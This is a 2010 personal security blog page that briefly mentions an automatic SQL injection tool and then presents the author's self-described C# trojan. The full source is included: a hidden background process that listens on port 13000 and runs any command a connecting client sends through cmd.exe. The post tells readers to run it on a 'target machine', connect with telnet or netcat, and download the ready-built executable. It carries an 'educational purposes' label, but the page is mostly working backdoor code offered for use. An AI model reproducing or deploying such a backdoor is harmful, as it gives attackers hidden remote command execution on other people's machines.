Hi folks! This is an update about the automatic SQL injection tool I started developing.
My first intention was to develop a simple automatic injection tool, then when I started developing it I found it to be far from simple. That is why I decided to join forces with my colleague Raviv Raz who previously developed Multinjector. We intend to greatly improve and extend its functionality. You can read all about it at Raviv's blog. Updates and code reviews will be posted by me later on.
Have a good weekend,
-Herzel
Thursday, May 20, 2010
Saturday, May 1, 2010
My own C# trojan - remote shell command execution
In this post I will present you a simple "shell" I created using c#.NET.
The trojan runs in the background, opens a listening port on the machine running it and allows any connected client to execute remote shell commands.
This application is for educational purposes only (mostly my own).
how to use it?
Simply run the trojan on the target machine and connect to it through port 13000 using telnet or netcat. After the connection had established, you may execute any shell command on the target machine:
Oh.. and don't forget to kill that process when you finish playing with it :)
-herzel
The trojan runs in the background, opens a listening port on the machine running it and allows any connected client to execute remote shell commands.
This application is for educational purposes only (mostly my own).
how to use it?
Simply run the trojan on the target machine and connect to it through port 13000 using telnet or netcat. After the connection had established, you may execute any shell command on the target machine:
code:
[STAThread]
static void Main()
{
ProcessStartInfo processInfo;
Process process;
TcpListener server = null;
bool isFirst = true;
try
{
// Set the TcpListener on port 13000.
Int32 port = 13000;
// Set the server to run locally
IPAddress localAddr = IPAddress.Parse("127.0.0.1");
server = new TcpListener(localAddr, port);
// Start listening for client requests.
server.Start();
// Buffer for reading data
Byte[] bytes = new Byte[256];
String command = null;
int i;
string recv_char;
byte[] msg;
// Perform a blocking call to accept requests.
TcpClient client = server.AcceptTcpClient();
// Get a stream object for reading and writing
NetworkStream stream = client.GetStream();
// Say hello
msg = System.Text.Encoding.ASCII.GetBytes("Welcome Master! enter a command to execute or enter exit:\r\n");
stream.Write(msg, 0, msg.Length);
// Enter the listening loop.
while (true)
{
if (!isFirst)
{
msg = System.Text.Encoding.ASCII.GetBytes("Enter a command:\r\n");
stream.Write(msg, 0, msg.Length);
}
// reset the command
command = null;
// Loop to receive all the data sent by the client.
while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
{
// Translate data bytes to a ASCII string.
recv_char = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
command += recv_char;
if (command.Contains("\n"))
break;
}
if (command.Equals("exit\r\n"))
{
// If exit entered shutdown and end connection
msg = System.Text.Encoding.ASCII.GetBytes("Bye Bye Master...\r\n");
stream.Write(msg, 0, msg.Length);
client.Close();
break;
}
// execute the command received (/C to terminate process after execution):
processInfo = new ProcessStartInfo("cmd.exe", "/C " + command);
processInfo.CreateNoWindow = true; // don't open a window
processInfo.RedirectStandardOutput = true; // don't show output
processInfo.UseShellExecute = false; // don't use a shell
process = Process.Start(processInfo); // start the process
string output = process.StandardOutput.ReadToEnd();
process.Close(); // close the process
isFirst = false;
if (output != null)
{
msg = System.Text.Encoding.ASCII.GetBytes(output + "\n");
// Send back a response.
stream.Write(msg, 0, msg.Length);
}
else
{
msg = System.Text.Encoding.ASCII.GetBytes("Sorry Master, command execution failed\r\n");
// Send back a response.
stream.Write(msg, 0, msg.Length);
}
}
}
catch
{
// do nothing
}
finally
{
// Stop listening for new clients.
server.Stop();
}
}
You may download the executable file from here.Oh.. and don't forget to kill that process when you finish playing with it :)
-herzel
Subscribe to:
Posts (Atom)